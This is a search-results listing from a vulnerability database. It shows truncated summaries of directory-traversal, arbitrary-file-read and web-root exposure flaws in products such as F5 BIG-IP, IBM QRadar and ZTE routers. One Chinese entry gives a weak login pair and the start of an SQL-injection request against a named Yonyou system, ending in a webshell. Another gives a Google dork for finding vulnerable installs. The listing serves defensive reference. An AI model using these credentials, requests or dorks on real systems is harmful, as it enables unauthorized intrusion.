1369 matches found
Design/Logic Flaw
IBM QRadar SIEM 7.1 before MR2 Patch 13 and 7.2 before 7.2.7 uses weak permissions for unspecified directories under the web root, which allows local users to modify data by writing to a file...
CVE-2016-2877
IBM QRadar SIEM 7.1 before MR2 Patch 13 and 7.2 before 7.2.7 uses weak permissions for unspecified directories under the web root, which allows local users to modify data by writing to a file...
Arbitrary File Read Vulnerability in zzcms 7.2 Version
ZZCMS highlights the investment and supply and demand functions, you can quickly build a product investment website. ZZCMS v7.1 has an arbitrary file read vulnerability that can be exploited by an attacker to access restricted directories and execute commands outside the root directory of the web...
File Download Vulnerability in AVTECH Devices
AVTECH, founded in 1996, is one of the world's leading CCTV manufacturers. The main products are surveillance equipment, network cameras, network video recorders and so on. A file download vulnerability exists in AVTECH devices. As the cab file request authenticated by the streamd web server is t...
ZKTeco ZKBioSecurity 3.0 - Directory Traversal
ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd Product web page: http://www.zkteco.com Affected version: 3.0.1.0R230 Platform: 3.0.1.0R230 Personnel: 1.0.1.0R1916 Access: 6.0.1.0R1757 Elevator:...
PHP Power Browse 1.2 Path Traversal
Exploit Title: PHP Power Browse v1.2 - Path Traversal Google Dork: intitle:PHP Power Browse inurl:browse.php Exploit Author: Manuel Mancera sinkmanu | sinkmanu at gmail dot com Software URL: https://github.com/arzynik/PHPPowerBrowse Version: 1.2 Vulnerability Type : Path traversal Severity : High...
CVE-2016-5307
Summary: CVE-2016-5307 is a directory traversal vulnerability in the Symantec Endpoint Protection Manager (SEPM) management console, affecting SEPM 12.1 installations prior to 12.1 RU6 MP5. The issue permits remote authenticated users to read arbitrary files within the web-root directory tree via...
用友某系统从弱口令到sql注射到getshell
简要描述: 弱口令、sql注射、getshell 详细说明: 系统地址: http://vip.ufida.com.cn/Frame/Index.aspx 弱口令帐号:adminnc 密码:adminnc 在自助查询处,发现注入(需要登录,注意cookie有时效) GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1 Accept: text/html, application/xhtml+xml, /...
F5 BIG-IP Directory Traversal Vulnerability
F5 BIG-IP products provide organizations with integrated application delivery services such as acceleration, security, access control and high availability. A directory traversal vulnerability exists in the configuration program of F5 BIG-IP versions prior to 12.0.0, Enterprise Manager versions...
F5 BIG-IP - BIG-IP Configuration utility vulnerability CVE-2015-4040
The remote host is missing a security patch. SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/h:f5:big-ip"; if description...
CVE-2015-4040
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors...
Directory traversal
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors...
CVE-2015-4040
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors...
PT-2015-6396
Name of the Vulnerable Software and Affected Versions F5 BIG-IP versions prior to 12.0.0 Enterprise Manager versions 3.0.0 through 3.1.1 Description A directory traversal issue exists in the configuration utility, allowing remote authenticated users to access arbitrary files in the web root...
F5 Networks BIG-IP : BIG-IP Configuration utility vulnerability (K17253)
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors. CVE-2015-4040 Impact An authenticated user is able to traverse...
E-Detective Lawful Interception System LFD / Code Execution
Advisory: E-Detective Lawful Interception System multiple security vulnerabilities Date: 14/06/2015 CVE: unassigned Authors: Mustafa Al-Bassam https://musalbas.com slipstream/RoL https://twitter.com/TheWack0lian Software: Decision Group E-Detective Lawful Interception System Vendor URL:...
CVE-2014-8605
The XCloner plugin 3.1.1 for WordPress and 3.5.1 for Joomla! stores database backup files with predictable names under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to a backup file in administrators/backups/...
CVE-2014-8605
The XCloner plugin 3.1.1 for WordPress and 3.5.1 for Joomla! stores database backup files with predictable names under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to a backup file in administrators/backups/...
Directory traversal
Directory traversal vulnerability in the FTP server on Honeywell Excel Web XL1000C50 52 I/O, XL1000C100 104 I/O, XL1000C500 300 I/O, XL1000C1000 600 I/O, XL1000C50U 52 I/O UUKL, XL1000C100U 104 I/O UUKL, XL1000C500U 300 I/O UUKL, and XL1000C1000U 600 I/O UUKL controllers before 2.04.01 allows...
VulnCheck KEV: CVE-2014-4019
ZTE ZXV10 W300 router with firmware W300V1.0.0aZRDLK stores sensitive information under the web root with insufficient access control, which allows remote attackers to read backup files via a direct request for rom-0...